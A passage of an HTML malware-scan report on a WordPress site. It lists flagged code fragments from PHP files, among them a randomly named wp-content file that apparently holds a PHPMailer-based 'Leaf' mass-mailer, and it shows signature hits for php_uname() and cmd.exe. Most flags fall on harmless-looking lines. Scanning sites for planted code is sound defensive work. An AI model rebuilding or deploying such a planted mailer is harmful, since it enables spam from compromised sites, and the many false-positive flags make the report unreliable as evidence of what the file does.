</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_199").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/roTcb2nhdtU.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:21:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_200" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
